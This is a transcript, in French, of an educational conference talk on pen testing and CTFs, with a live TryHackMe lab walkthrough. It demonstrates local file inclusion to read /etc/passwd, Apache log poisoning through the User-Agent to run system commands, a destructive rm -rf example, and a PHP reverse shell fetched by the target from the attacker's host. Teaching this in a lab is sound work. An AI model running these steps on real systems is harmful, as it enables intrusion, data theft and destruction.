Alors, aujourd'hui, on va essayer ensemble de découvrir le pen testing. Vous en avez peut-être déjà entendu parler, notamment un cas un peu plus particulier qui est le CTF. Il y a notamment eu une conf hier sur la cybersécurité qui a traité des CTF. Donc quelques mots d'abord. Donc je m'appelle Kevin Descoubes, j'ai 35 ans, je suis passionné de sécurité informatique depuis bientôt 20 ans. Je dirige une agence web qui est l'agence web Kernel. Il y a pas mal de monde ici voilà, qui sont présents. Vous pouvez me retrouver sur Twitter, sur LinkedIn, etc. Alors, c'est quoi un pen test? Donc, il n'y a pas longtemps, j'ai fait une présentation d'un pen test dans un event tech à Tours, et on m'a demandé si c'était un test de stylo. Donc non, c'est pas un test de stylo. Pen test, c'est pour test de pénétration, et quand on parle test de pénétration, c'est d'un système d'information. Ça peut être soit un métier, c'est ce qu'on appelle un hacker éthique. Il y a beaucoup de vidéos sur le sujet, je vous invite à aller voir, c'est assez passionnant, donc, ou un pen tester. Et sinon, ça peut être une passion, un hobby ou un jeu. Et là, c'est ce qu'on appelle le CTF. Le CTF, c'est peut-être quelque chose que vous avez déjà entendu parler. Donc, CTF pour Capture the Flag. Vous l'avez peut-être déjà vu dans d'autres disciplines. Par exemple, on peut l'avoir sur du paintball, on peut l'avoir sur des jeux vidéo parfois. C'est le principe de, il y a deux équipes qui s'affrontent généralement et vont chercher un drapeau au milieu. Nous, ici, on va juste se battre contre une machine. Donc, on va avoir la mise à disposition d'une machine virtuelle qui va exposer une ou plusieurs failles. Et les fameux flags à trouver, en fait, ça va être des mots de passe qui sont sur le serveur. La plupart du temps, il y a juste 2 flags à trouver, ce qu'on appelle le user flag. Donc, quand vous allez réussir à hacker la machine suffisamment pour vous connecter avec un user, vous allez trouver un mot de passe qui était le user flag. Et ensuite, on va essayer d'aller plus loin, faire ce qu'on appelle une escalade de privilèges, pour réussir à être root sur la machine et avoir le root flag. Juste ici, par pure curiosité, qui a déjà fait du CTF ou du pen testing, juste pour s'amuser? Ok. Alors, comment faire du CTF? Il y a plein de façons pour pouvoir s'entraîner à ça. Notamment, il y a des plateformes comme Hack the Box, TryHackMe, RootMe. Tout ça, c'est des plateformes qui vont être alors, parfois gratuites. Il va y avoir des parties payantes. Il va y avoir des plateformes qui sont plus axées pour les débutants, d'autres plus axées pour les écoles, pour les entreprises, pour les formations, avec des tarifs assez différents. Les plateformes, donc les 3 que j'ai citées pour l'instant, elles ont l'avantage de vous donner vraiment beaucoup de contenu. Que Vulnub, c'est un cas un petit peu différent. On va vous inviter à télécharger des machines virtuelles, donc avec des fichiers type des OVA, OVF, des points ISO, etc., que vous allez mettre dans un outil à vous, un logiciel qui gère les machines virtuelles, et vous allez faire ça chez vous, sur votre machine. Vulnub, c'est un site communautaire et ça a évidemment les avantages et des inconvénients. Notamment, il n'y a quasi aucune machine sous Windows, puisque sinon ils auraient un problème de distribuer des machines avec des licences, ce qui n'est pas possible. Bon, c'est bien pour commencer ou pour faire vraiment des petits labs, mais sinon après, les plateformes à côté seront vraiment beaucoup mieux. Donc, quels outils on va utiliser? Alors, si on utilise sa propre machine virtuelle, on va utiliser souvent VMware ou VirtualBox, qui vont nous permettre d'installer une distribution Linux. Et il y a des distributions Linux qui sont spécialisées dans le pentest, notamment Kali Linux. Pour les plus anciens, c'était Backtrack avant. Et plus récemment, Parrot OS. C'est ce qu'on va utiliser aujourd'hui. Petit disclaimer, évidemment, cette conf, elle est à usage éducatif et préventif uniquement. Le pen testing, c'est quelque chose qui doit être encadré très précisément parce que c'est fortement répréhensible. Donc, soit vous êtes missionné pour ça et vous avez un contrat avec un périmètre, avec une plage d'IP que vous pouvez attaquer, avec des dates à laquelle vous pouvez faire ça. Soit vous faites ça en privé, donc via une plateforme, via un laboratoire, comme vous voulez, mais en tout cas, c'est soit l'un, soit l'autre. Les risques encourus sont grands. J'imagine que si vous êtes là, c'est que vous travaillez déjà dans le monde de l'informatique ou que vous espérez travailler dans le monde de l'informatique. Ce serait dommage d'avoir un petit peu des bâtons dans les roues à ce niveau-là. Voilà, ça c'était pour la petite présentation et maintenant on va le faire en live. Donc, j'ai choisi comme plateforme pour vous montrer tout ça, TryHackMe. TryHackMe a plusieurs avantages. Je ne suis pas affilié à l'une ou l'autre plateforme, mais notamment, elle permet d'avoir directement dans le navigateur la machine virtuelle. C'est-à-dire que je n'ai rien à installer sur mon poste si ce n'est un navigateur web.
Pour des raisons de simplicité, j'ai déjà démarré à l'avance la machine virtuelle qui met à peu près 2 minutes à démarrer, la machine attaquante, et aussi la machine target, celle qu'on va attaquer. Donc normalement, on a testé, ça marche, oui. Donc ce que vous voyez là, je vais même d'abord vous faire voir l'autre interface. Voilà. Ici, vous avez... Hop. Non. Là, c'est en écran splitté, c'est pas très intéressant, mais juste pour vous faire voir, ça c'est à gauche, vous avez l'interface de TryHackMe et à droite votre machine virtuelle, mais on l'a en plein écran à côté. Voilà. Donc, évidemment, ça fait un petit peu Inception, c'est-à-dire qu'il y a mon navigateur dans lequel il y a la parotte OS dans lequel j'ai ouvert Firefox. Donc ça fait un peu Inception, mais vous occupez pas des lignes du haut. Donc sur TryHackMe, on m'a donné quand même ici, sur ma machine, une adresse IP. Donc la machine, c'est 10.10.192.204. C'est donc des IP locales. La machine virtuelle que vous allez contrôler est sur le même réseau local. Elles peuvent communiquer entre elles. On va donc pouvoir essayer de commencer à s'attaquer à cette machine. Première étape, quand on a une cible qui nous a été désignée, on va faire ce qu'on appelle une énumération. Une énumération, c'est essayer de récupérer un maximum d'informations à propos de votre cible. Si on était dans un cas réel, on pourrait imaginer une énumération avec tout ce que vous voulez, société.com, les pages jaunes, le site internet, etc. Nous, ici, on va juste disposer d'une adresse IP qui est sur un réseau local. On ne va pas aller très très loin. Donc dans ce cas, l'énumération, généralement, elle s'arrête. Elle va surtout consister dans un premier temps à un scan de port. Donc il y a un scanner connu de port qui s'appelle Nmap, et avec ici des arguments qui sont les arguments les plus souvent utilisés. Je vous invite, quand vous découvrez des nouveaux outils comme ça, de tous les cas, à chercher sur Internet le nom de l'outil. Donc là, Nmap et Nmap Cheat Sheet, feuille de triche. Vous allez récupérer toutes les commandes toutes les commandes les plus courantes sur cet outil. Vous avez peut-être, je sais pas, 100 options différentes sur Nmap, alors que très régulièrement, vous allez en utiliser une dizaine et ça sera déjà très bien. Donc, on a dit que l'adresse IP... Hop, j'ouvre un terminal. Est-ce que la lisibilité, c'est OK ou il faut que je grossisse encore? C'est bon? OK. Donc, on a dit nmap-sc-sv-st de 10, 192, 204. Donc, le scanner de port, il va aller scanner les 1000 premiers ports de la machine et les différents arguments que je lui ai donnés là, il va nous dire si les ports sont ouverts ou fermés, quel est le type de service qui doit tourner dessus, et peut-être d'autres informations. Et c'est le cas. Donc ici, il nous dit que sur les 1000 premiers ports, il en a trouvé 998 qui étaient fermés, bon, qu'il a trouvé le port 22 ouvert. Le port 22, c'est normalement le port pour SSH. Et ici, il nous dit qu'en effet, on a trouvé la version OpenSSH 7.6p1 Ubuntu. OK. Deuxième info, on a trouvé qu'il y avait le port 80 qui était ouvert. C'est donc le port HTTP et on sait même que c'est le serveur Apache 2.4.38. On a quelques autres infos, la MAC adresse, voilà, 2-3 infos comme ça, mais qui ne vont pas nous servir aujourd'hui. Bon, un serveur SSH, on peut essayer de se connecter peut-être avec des identifiants par défaut, test, admin, des choses comme ça. Ici, évidemment, je vais me concentrer sur l'essentiel. Normalement, quand vous faites du pen testing ou du CTF, il y a une très longue partie de recherche. Une des clés du pen testing, c'est la patience. Et c'est faire 99 tests et finalement le 100e fonctionne. C'est un peu ça. Donc ici, on nous dit qu'il y a un site web qui tourne sur ce serveur. Eh bien, allons voir. OK. Un site web, ça nous dit gallery of various dogs and cats. OK. What would you like to see? C'est plutôt team chat ou team chien ici? Allez, team chat. OK. Donc, on a un super chat qui apparaît. Bon, il y avait peut-être des team chiens quand même, donc on va faire plaisir à tout le monde. Voilà. Et visiblement, voilà, ça affiche des chats et des chiens, un peu de manière random et infinie. On va essayer de récupérer plus d'informations. Alors, pour récupérer plus d'informations, il y a plein d'outils.
des outils que vous pouvez trouver dans le quotidien. Si vous faites du dev web, vous avez peut-être, et que vous êtes un peu curieux, vous avez peut-être souvent le truc où vous vous dites, tiens, mais ce site-là, il est fait quoi? Alors ça, si on prend par exemple le site de Tourentech, peut-être pas comme ça. Hop. Et si vous avez l'habitude d'utiliser une extension comme par exemple celle-ci qui s'appelle Wapalizer, vous l'ouvrez et ça vous dit instantanément, ça va peut-être être en petit, je suis désolé, ça vous dit directement que le site est fait en Vue, plus précisément en Nuxt, qui a un cache varnish, etc. Tout ça, c'est des infos qui sont soit déduites, soit directement présentes dans du code. Si par exemple vous utilisez Bootstrap, il y a de grandes chances que quelque part vous aviez inclus un fichier qui s'appelle Bootstrap et que dans ce fichier il y a marqué Bootstrap. Donc on en déduit rapidement les choses. On peut essayer ici, je ne l'ai même pas testé d'ailleurs, parce que vu que c'est du code maison, souvent ça ne ressort pas grand chose. Voilà, Apache. Ah si, on a quand même ici déjà l'info que c'est PHP. Pour info, selon les normes de sécurité qui sont mises, selon les langages, selon les frameworks, etc., ça peut vraiment vous ressortir beaucoup d'infos ou beaucoup moins. Si on prend le site, encore une fois, hop, si on prend le site de kernel par exemple, on a du HTTP2, on sait que c'est un serveur Apache, et c'est à peu près tout. Bon, si vous passez 30 secondes sur le site, vous verrez que c'est du Laravel et en PHP, donc. Mais du coup, voilà, il y a des frameworks qui vont beaucoup moins avoir d'empreintes, notamment dans le code source, etc. Donc, voilà. Bougez pas, j'ouvre ma fenêtre. Du coup, ici déjà, on sait que c'est du PHP. Alors sinon, si on n'avait pas eu l'info directement comme ça, on peut toujours déjà essayer de se dire, ok, normalement, un site, il commence par avoir une page index. Ce que vous voulez, mais il y a une page index quelque part. Donc j'essaie une page index.html. Ah, j'ai dû switcher de clavier. Hop. Donc index.html, c'est non. Index.htm, c'est non. Du coup, bon, on a eu l'info avec Wapalizer, index.php, c'est oui. Donc, c'est du code PHP, ok. Et on se rend compte quand même que quand on va cliquer ici, là, on a dans l'URL, on a point d'interrogation view égale dog. On peut se dire qu'il y a donc un argument avec un paramètre qui lui est donné, une valeur. Et quand on a ça, on peut assez rapidement penser à est-ce que ces arguments, on peut jouer avec, par exemple. Est-ce que je peux essayer de mettre, là il y a marqué dog, est-ce que je peux marquer test? Non, sorry, only dogs or cats are allowed. Ok. Bon, est-ce qu'on se dit que la capacité d'inclure quelque chose, elle est liée peut-être à une présence de fichiers? C'est-à-dire qu'on peut faire que view égale et une view qui existe, un fichier qui est là. Ça, pour le tester, on peut se dire, on peut faire plein de tests. Hein. Et évidemment, vous allez voir que je vais vous présenter directement un peu les bonnes réponses. Mais bon, on peut se dire que peut-être qu'il y a un fichier dog.php qui est là, .php, et que c'est ça qui est inclus dedans. Et si on regarde, 4.php, c'est bien juste le petit bout de code qui nous rend l'image. Une image random, si j'actualise ma page, à chaque fois, c'est une image différente. Donc, visiblement, le code view, là, il va prendre un fichier et il va l'inclure. Visiblement, il y a une fonction random, il va bien utiliser ce fichier et l'utiliser en PHP. Ok. On va commencer à se dire, qu'est-ce que je peux faire avec ça? Donc là, vous allez réfléchir à plein de choses, mais surtout, avec le temps, vous allez vous dire, il y a des petites alertes qui vont arriver. Et là, la première alerte, c'est LFI. LFI, qu'est-ce que c'est, selon vous? Donc la française, non, c'est Local File Inclusion. Ça veut dire qu'on peut imaginer qu'il y a un code de ce type-là, qui va donc faire une inclusion d'un fichier. Simplement, ça a été suffisamment mal protégé pour se dire que je m'attends à ce qu'un fichier soit présent dans ce répertoire, qui finisse par .php, okay, et au milieu, c'est la fête. On fait ce qu'on veut. Du coup, si par exemple on commence par faire // on remonte d'un cran. Et donc si là on fait // config.php, peut-être qu'on peut se mettre à lire le fichier config.php. Alors, le lire, non, si c'est un fichier PHP, on va l'exécuter. Donc là, on va chercher autre chose, c'est qu'on va se dire,
j'aimerais bien non pas exécuter le fichier, mais le lire. Et à partir du moment où un serveur web, c'est un serveur qui sait gérer le PHP, si vous lui mettez un fichier PHP, il va l'exécuter, il ne va pas vous le lire, il ne va pas vous le télécharger. Donc il faut qu'on trouve une solution. On va sur Google, on cherche PHP LFI. Et du coup, on nous parle très vite, dans les résultats, notamment les compléments, on nous parle tout de suite de filters. Alors, qu'est-ce que c'est les PHP filters? Ça fait 20 ans, quasiment 20 ans que je fais du PHP, 15 ans que je dirige des agences web qui font du PHP. J'ai jamais utilisé les PHP filters, autrement que dans du pentest. Donc si vous faites du PHP et que vous ne connaissez pas cette fonctionnalité, personne ne vous en veut. Les PHP filters, c'est une sorte de wrapper qui va vous permettre d'encoder, de traiter un flux de données, avant même qu'il soit injecté dans la page. Et notamment, il y a un filtre par défaut dans PHP qui s'appelle base64 en code. Et donc, si vous lui mettez view égale votre PHP filter, etc., base64 en code et le fichier, et cette partie-là va automatiquement être exécutée et va vous donner le contenu de ça dans la page. Donc ça nous paraît plutôt pas mal parce qu'on se dit qu'on va peut-être se retrouver avec le contenu de notre page. Alors certes en base64, mais on sait le décoder. Ok. Toujours confiance, ce genre de site. Donc ici, on nous explique comment ça marche. Hop, voilà. Donc on nous dit ici qu'on peut utiliser, en lieu et place de l'argument, donc PHP filter convert .base64 en code, ressource égale et le nom du fichier. On va essayer ça. Donc je retourne sur mon index. Hop. C'est pas parce qu'on fait du hacking qu'on est obligé d'être dans le noir, hein, on peut laisser la lumière. Hein. Et donc eux ils nous disent qu'on peut faire ça comme ça et de faire ressource égale index. Sorry, only dogs or cats are allowed. C'est vrai qu'on avait oublié cette problématique. A priori, il s'attend à ce qu'on ait dog ou cat tout le temps qui soit là. Bon. Je vous rappelle que la partie PHP filter, à partir du moment, donc toute cette partie-là, à partir du moment où je fais entrer, elle est exécutée. C'est comme si elle n'existait pas. Vous la voyez encore dans votre barre d'URL, mais elle n'existe plus. Donc, c'est pas grave si c'est pas view égale dog directement, c'est pas grave si le dog il vient que un peu plus tard. Donc, je remets mon dog ici, et puis je me dis, allez, je fais comme si c'était un dossier, et je remonte d'un cran, et c'est là où est mon fichier index.php. Donc, moi, je voudrais bien avoir ça. Ah, une erreur. Là, déjà, c'est un bon point pour la sécurité, enfin, un mauvais point ici, mais un bon point à souligner. Les messages d'erreur, en prod, on ne les affiche pas, parce que ça donne des infos. Ici, ça nous dit qu'on a essayé d'utiliser donc bien une faille include, enfin, la fonction include, avec PHP filter, etc., sur index.php.php. Si on repense un peu tout à l'heure à ce qu'on se disait ici, c'est que, en effet, le code est déjà prévu de remplir .php à la fin. Donc, nous, on met un .php, il en remet un derrière, ça fait .php.php, ça n'a pas de sens. Ok, j'ai compris. J'enlève. Non. J'enlève .php. Vous verrez, si vous vous mettez à faire des box, on appelle ça faire une box, là, les CTF, elles ont toujours un thème un peu sympa. Vous allez faire un, c'est les pizzas, et il y a des pizzas partout, il y en a un, c'est des bières, là, c'est des chats, des chiens, ça change un peu. Donc là, j'ai essayé ça, et en effet, vous voyez, il y a bien toujours mon here you go, et derrière, il y a quelque chose qui ressemble à être une chaîne base64. Je vais prendre tout ça. Allez, on y croit. Merci. Je mets ça dans un fichier. J'enlève le petit here you go qui n'a rien à faire là. Et donc du coup, je vais tout simplement décoder le fichier. C'est du base64. C'est natif sous Linux, il y a base64-d. Voilà. Et là, j'accède au code source de la page. Alors, il y a le code HTML, ça, un contrôle U nous l'aurait donné aussi, hein. Mais il y a aussi le code PHP. Alors là, déjà, ça commence à être intéressant. Donc, le code PHP, il se situe vraiment juste ici, là. Donc, d'abord, on a une fonction containString, enfin containStr, ok. On va voir ce que ça donne, comment elle s'en sert plus tard. Ensuite, on déclare une variable qui s'appelle ext, et qui nous dit que
en fait, on cherche un paramètre $get, comme ça, c'est un paramètre d'URL. Donc en fait, on cherche si un paramètre d'URL ext est défini, auquel cas on l'utilise, sinon on met .php. Donc c'est bien ça qu'on se disait à un moment, que ça complète par .php. Et on comprend que si à un moment on va vouloir aller voir un fichier qui n'est pas du .php, il suffit qu'on rajoute ext égale rien, par exemple, et on pourra aller voir le fichier qu'on veut. Et ensuite, on regarde par rapport à view, si view est bien rempli, on regarde si dans le paramètre view, on trouve soit dog, soit cat. Alors, on n'a même pas besoin de commencer par, finir par ou quoi que ce soit. Si on trouve dog ou cat quelque part dedans, c'est gagné. Donc, autant dire, pas de sécurité. OK. Alors, avec ça comme information, on va maintenant essayer de se dire que... on va essayer d'aller voir d'autres fichiers. Donc, j'enlève mon petit PHP filter qui n'a plus vraiment de sens. Et on met dog, parce qu'il aime bien. Et donc, on a pu voir dans une erreur juste avant, ça nous a dit qu'il y avait une erreur dans le fichier var 3w html index.php. Donc, on sait où on se trouve. Quel est un fichier Linux qu'on connaît tous, qui est présent sur toutes les machines, qui peut nous donner une information sur les users? Le fichier etc passwd. Donc, il faut revenir à la racine. Donc, on est dans var 3w html, dog, on remonte, on est dans on est dans var 3w html, var 3w, var, slash, etc, passwd, et on n'oublie pas, endExt égale rien, puisqu'on a bien vu que si je ne mettais pas ça, il va essayer d'aller chercher le fichier etc passwd.php, ce qui n'a pas de sens. Je regarde, alors c'est pas très lisible comme ça l'est un peu plus comme ça. J'accède à la liste des users. Bon, déjà au niveau sécurité, on n'est pas très bien. On peut voir d'ailleurs au passage qu'il n'y a pas d'utilisateurs qui ont l'air d'avoir des prénoms d'humains et que même dans un fichier comme ça, la toute dernière colonne, c'est son shell, le shell avec lequel il va se connecter. Et ici, on voit qu'il est placé sur USR SBIN no login. Ils n'ont pas le droit de se connecter. Aucun des utilisateurs n'a le droit de se connecter. Il y a juste root, le super utilisateur, qui lui peut se connecter. OK. Qu'est-ce qu'on peut faire de ça? On se rend compte qu'on est capable d'inclure n'importe quel fichier sur le file system, a priori, n'importe quel fichier pour lequel notre utilisateur a le droit d'accéder. Et on sait que ce fichier, il va exécuter du PHP. Enfin, s'il y a du PHP dedans, on va l'exécuter. Il va donc falloir trouver un fichier qu'on arrive à manipuler, dans lequel on arrive à mettre notre propre code PHP, et qu'ensuite on va pouvoir afficher. Un fichier qui va évoluer au fur et à mesure de nos visites. C'est ce qu'on appelle un fichier de log, globalement. Un fichier de log, au fur et à mesure où on va le consulter, il va évoluer. Donc, plutôt que d'aller voir etc passwd, je vais aller voir var log apache2 access.log. Évidemment, dans la vie, c'est vrai que je n'ai pas précisé, mais moi je suis administrateur système, donc les chemins des fichiers, je les connais forcément par cœur. Mais sinon, vous cherchez apache2 log, voilà, vous allez trouver tout de suite où ça se trouve. Donc là, je dois avoir un... Ouais, mais j'ai fait exprès justement. Ah oui, mais oui, j'ai fait exprès parce que je voulais pas retaper le var. Puisqu'on était déjà dans var au départ. Donc ici, on a bien notre fichier access.log avec nos recherches. Avec nos consultations, pardon. Encore une fois, je vais l'afficher comme ça, c'est un peu plus lisible. Une ligne de log comme ça, elle est basée, enfin, elle va avoir plusieurs éléments. D'abord, 127.0.0.1, c'est donc l'adresse IP. Il y a peu de chances qu'on arrive à modifier une adresse IP en code PHP. On peut essayer, mais ça va prendre du temps. Ensuite, il y a la date et l'heure. Pareil, peu de chances qu'on arrive à la modifier, c'est géré côté serveur, on ne peut pas faire grand-chose. Ensuite, on a, alors là, c'est pas très parlant, mais si on prend nos propres visites, parce qu'il y a Nmap qui a foutu un peu le bazar. Voilà, ici, on peut voir, par exemple, get slash point d'interrogation view égale dog. Ça, c'est nous qui l'avons tapé dans la barre d'adresse. Donc ça, on peut le manipuler. Mais on va avoir un autre problème, c'est que votre navigateur, il va naturellement réencoder ce que vous avez mis, puisque vous n'avez pas le droit normalement de mettre des caractères spéciaux dans l'URL. Nous, on va vouloir taper du code PHP. Les premiers caractères qu'on va vouloir taper, c'est chevron point d'interrogation PHP. Ça va sauter. Donc ce champ, il est parfois utilisable avec des outils pour réencoder l'URL, etc. Mais globalement, ça reste assez complexe. Et enfin, à la fin, vous avez ici la déclaration du navigateur. La déclaration du navigateur, c'est ce qu'on appelle le user agent. Et le user agent, c'est quelque chose qui est déclaratif.
C'est-à-dire que le navigateur se présente et il dit bonjour, je suis Mozilla, ou bonjour, je suis Googlebot, ou bonjour, je suis un iPhone sous iOS. Voilà. C'est du déclaratif. Et donc ça peut se changer. C'est propre à son navigateur. Pour ça, il existe des petits outils. Donc par exemple, hop, on va prendre par exemple un module qui s'appelle User Agent Switcher. Hop. Tout ça peut aussi se faire en ligne de commande avec curl ou des choses comme ça. Ici, c'est la version un peu plus user-friendly. Donc, j'ai un nouveau module qui est disponible, qui s'appelle User Agent Switcher, et qui me dit qu'est-ce que tu veux comme User Agent. Est-ce que tu veux te faire passer pour macOS? Moi qui adore les Mac. Donc on va voir, j'ai rafraîchi la page, et là du coup ça me dit que je suis sur Mozilla, Macintosh, Intel, macOS. Et voilà. Donc, je peux modifier ça. Bon, on va tester vraiment avec quelque chose qui pourrait plus nous intéresser, parce que là, se faire passer pour Mac, ça ne sert pas à grand-chose. Donc je vais faire Préférences, et là je peux ajouter mes propres User Agents. Hop, donc je vais appeler mon nouveau User Agent, je vais l'appeler Poison. Parce que là, ce qu'on va faire, en fait, c'est ce qu'on appelle du log poisoning. C'est quelque chose qui a été pendant un moment enfin, on en a beaucoup entendu parler. Il y a une faille qui est sortie il y a quelques années qui s'appelle Log4j, Log4j, et qui a impacté beaucoup de machines. Donc du coup, je vais l'appeler Poison. Je vais le mettre dans la catégorie Desktop. Et donc, je vais écrire du code PHP dedans. Et je vais juste essayer un truc tout bête pour l'instant, c'est que je vais utiliser la fonction système. C'est une fonction qui va permettre d'exécuter une fonction système, Linux. Et dans système, je vais lui mettre whoami. Whoami, ça va me retourner quel est l'utilisateur qui est utilisé pour utiliser le serveur web. Ça va me permettre de savoir si je peux exécuter des commandes système et aussi savoir à quel niveau de privilège je suis. Donc PHP, système, whoami. Hop là. Je lui dis d'utiliser ça. Si vous utilisez cette extension, je ne sais pas pourquoi, mais très régulièrement, il repasse à défaut. Et on teste plein de choses, en fait, juste ça ne s'applique pas. Voilà. Donc, je l'ai fait, j'ai actualisé. Et là, mon user agent, maintenant, c'est www.data. OK. www.data, on l'a vu tout à l'heure dans la liste des utilisateurs, c'est l'utilisateur par défaut qui exécute à page 2. Donc, on peut lui faire passer des commandes système. Là, si on peut lui faire passer des commandes système, on arrive dans un autre type de faille encore. Le type de faille, c'est ce qu'on appelle RCE. Alors, RCE, il y avait beaucoup moins de jeux de mots possibles, donc on a fait ce qu'on a pu. Donc, Remote Command Execution. Ça veut dire qu'on va pouvoir faire exécuter quelque chose au serveur. Alors attention, encore une fois, on va pouvoir lui faire exécuter avec les droits qu'il a. Mais par exemple, là, si je veux, je lui mets système de rm-rf/var/3w/html, le site web disparaît. Ça nous fait une belle jambe, mais le site web n'est plus présent. Ça ne va pas vraiment nous aider, donc on va chercher autre chose. Et globalement, ce qu'on va essayer la plupart du temps, c'est quand même de pouvoir avoir un contrôle un peu plus pérenne que ça. C'est-à-dire que je ne vais pas m'amuser à chaque commande que je vais faire à modifier mon user agent et à attendre le résultat qui apparaît dans la page. J'aimerais bien avoir plutôt une connexion de type shell. Mais connexion de type shell, vous savez tous ce que c'est. Une connexion SSH, vous vous connectez à distance. Vous êtes le client, vous vous connectez à distance sur le serveur. Mais pour ça, il faudrait soit que j'ai l'identifiant SSH en face, un mot de passe, etc. Et puis, on ne sait pas dans quelle configuration on est. Ici, on sait qu'on est dans un même réseau local, mais un jour, vous allez attaquer une machine qui est peut-être assez loin, en fait, derrière un réseau, derrière un pare-feu, etc. Une machine qui n'a peut-être pas le port SSH d'ouvert, il y a juste le port HTTP, HTTPS. Vous ne pouvez pas prendre le contrôle à distance. Mais vous pouvez l'inviter chez vous. C'est ce qu'on appelle le reverse shell. Donc le reverse shell, je vous ai mis là le petit schéma. Donc vous avez le normal shell dans un sens, le reverse shell dans l'autre. Le reverse shell est déclenché de plein de façons différentes. Ça peut être soit via, vous avez trouvé quelque part, vous pouvez taper donc une commande système, etc. Et vous allez trouver une façon de déclencher un reverse shell dans l'autre sens. Ou aussi avec des fichiers, si vous arrivez à uploader un fichier qui va permettre d'ouvrir un shell de manière pérenne. Si vous voulez des petits reverse shell qui sont bien pratiques à utiliser, vous avez un site excellent qui s'appelle revshell.com
quand vous faites des box, vous allez voir, vous en essayez 1, 2, 3, 4, 5, et d'un seul coup ça marche. C'est peut-être pas avec... Ah, il n'y a pas de E là. Voilà, ici ça vous dit quel est votre IP, donc l'IP de... Attention, vous avez bien vu par rapport au schéma que j'ai mis tout à l'heure, mais il va falloir qu'on rentre notre IP, l'IP de notre machine d'attaque, puisqu'on va fournir à notre machine, à notre target, pour qu'elle se reconnecte chez nous. Donc ici, ça vous demande votre IP, le port sur lequel vous voulez faire tourner, et derrière, ça vous dit, voilà, si vous voulez le faire en bash, c'est comme ça, si vous voulez le faire avec Netcat, c'est comme ça, si vous voulez le faire en curl, c'est comme ça, en C Windows, en C bash, en Perl, en PHP, etc. Vous avez tout. Quand on utilise des distributions comme Parrot ou Kali, généralement, c'est déjà inclus dedans, vous en avez déjà qui sont inclus dedans. Donc on va faire ça. Hop. On va aller voir donc de base dans USR Share Web Shell, vous avez un reverse shell PHP qui est présent. Je vais le copier dans mon home, je l'appelle shell.php. Évidemment, il ne peut pas déjà être configuré avec votre IP, le port que vous voulez, etc. Donc vous n'oubliez pas d'aller le modifier. Honnêtement, vous verrez, ça vous arrivera forcément un jour et vous attendez que ça se connecte, ça ne marche pas, vous pensez que vous avez tout bien fait. Il y a un petit endroit, il y a marqué Change Me. Donc ici, hop, l'adresse IP, donc cette fois l'adresse IP de ma machine. Donc, hop. Donc 10.10.159.172 et le numéro du port. La plupart du temps, on utilise souvent le port 22.22. Donc pourquoi? Parce que le port SSH de base c'est 22. Et là on va essayer d'ouvrir un autre port. Souvent on ouvre un port qui est supérieur à 1000. On n'est pas forcément avec un utilisateur qui a les droits. Là je suis connecté en route, mais on n'a pas forcément d'utilisateur qui a les droits d'ouvrir un port en dessous de 1000. Donc on ouvre au-dessus. Donc voilà, le port 22.22. Et en fait après c'est des codes et on respecte un peu toujours ça et puis c'est pas mal, quoi. Donc, ok, j'ai un fichier. Maintenant, je voudrais le télécharger, l'envoyer sur la machine là-bas. Encore une fois, l'envoyer, je ne sais pas trop comment je vais faire. Il n'y a pas de serveur FTP, je n'ai pas d'identifiant, etc. Donc l'envoyer, ça me semble compliqué. Lui demander de télécharger, ça me semble jouable. Donc par contre, de le télécharger, il faudrait quand même que je lui laisse un moyen de le faire. Ce que je vais faire, c'est la façon la plus simple possible. Je vais ouvrir un tout petit serveur web en Python, pas en PHP, pour pas que ce soit exécuté et tout ça, pas avec Apache. Et comme ça, je vais en fait mettre à disposition un site web avec un seul fichier dessus téléchargeable, shell.php. Pour ça, ça se fait en une ligne en Python. Donc en Python 3, vous chargez juste le module HTTP server et un numéro de port. Ici, je vais prendre le 8000. Comme d'hab, c'est pareil, souvent, le port HTTP de base, c'est 80. On va choisir 8080 ou 8000, voilà, des choses comme ça. J'ouvre ça, j'ai un serveur qui est ouvert, je vais le tester. Quand même, hein, on ne sait jamais. Donc, si j'ouvre un onglet sur ma propre IP, donc 10.10.159, .shell.php, il y a un téléchargement qui se fait. Et si je retourne voir mon terminal, j'ai une ligne qui est apparue. Du coup, ça veut dire qu'il y a bien eu un téléchargement qui s'est effectué, il n'y a pas de souci. Donc maintenant, je vais essayer de faire la même chose sur la machine là-bas. Donc je vais encore utiliser pour l'instant mon petit poison, là, mon petit user agent switcher, et je vais essayer d'utiliser la commande wget. La commande wget, elle permet de télécharger un fichier. Ça paraît assez safe. Je suis désolé pour les alt tab, hein. À chaque fois j'essaie de faire alt tab, mais c'est alt tab sur mon PC, pas dans la VM. Donc user agent switcher. User agent switcher, hop, hop, tout ça j'ai plus besoin. Il est là. Et donc je lui dis que maintenant ce que je lui fais exécuter c'est plus système de whoami, mais système de wget http 10.10.159.172.8000 /shell.php. Ok, ça paraît à peu près logique. On vérifie qu'il soit toujours actif. Il s'est encore barré. On le remet et on actualise. Je vais voir déjà dans mes fichiers de log, dans mon serveur web, il n'y a rien. Bon, un peu lagging.
Visiblement, que ça va pas marcher comme ça. Je peux réessayer autant de fois que je veux, mais a priori, ça va pas marcher comme ça. Il peut y avoir plein de raisons. wget peut ne pas être installé sur le serveur en face. Il est possible que le user n'ait pas de variable d'environnement et donc il n'a pas la variable d'environnement path. Donc on est obligé de taper /bin/wget ou l'endroit où il est situé. Bon, on va faire autrement. Généralement, on va essayer d'utiliser les forces de la faille qu'on a trouvée. Et ici, c'est une faille qui est en PHP. Donc ce qu'on va faire, c'est qu'on va le faire en PHP. C'est forcément un peu moins marrant, mais encore une fois, vous n'êtes pas obligé de connaître un langage. Si vous saviez le nombre de box que j'ai fait en Perl, en Python, en Ruby, alors que ce n'est pas les langages dans lesquels j'excelle, c'est vraiment pas nécessaire de... Voilà. Vous cherchez en 3 lignes, vous trouvez, quoi. Donc, en PHP, je vais faire le téléchargement. Donc ça va être un petit peu plus long. Donc ça doit être bon à peu près à la fin là. C'est avant. Donc je ne vais pas utiliser la commande system wget. Hop. Je vais utiliser le bon vieux file put contents. Et je vais donc écrire un fichier qui va s'appeler shell.php. Et d'où est-ce qu'il vient? Il vient d'un file get contents de mon fichier de tout à l'heure. Donc ça va faire un file get contents que ça va ensuite réécrire sous le format shell, sous le fichier shell.php. J'oublie pas de refermer ma deuxième parenthèse, j'avais 2 fonctions imbriquées l'une dans l'autre. Hop. J'y vais, je retourne voir le poison s'il est toujours en place. Toujours pas. J'ai pas compris pourquoi ça. J'actualise et je retourne voir mon serveur web. Ah, on a un deuxième client. Tout à l'heure, je me suis auto-téléchargé un fichier. Cette fois, il y a un deuxième client qui est arrivé qui a téléchargé un fichier également. OK. Donc, a priori, vu que j'ai fait exécuter l'action à index.php et que je lui ai demandé d'écrire quelque 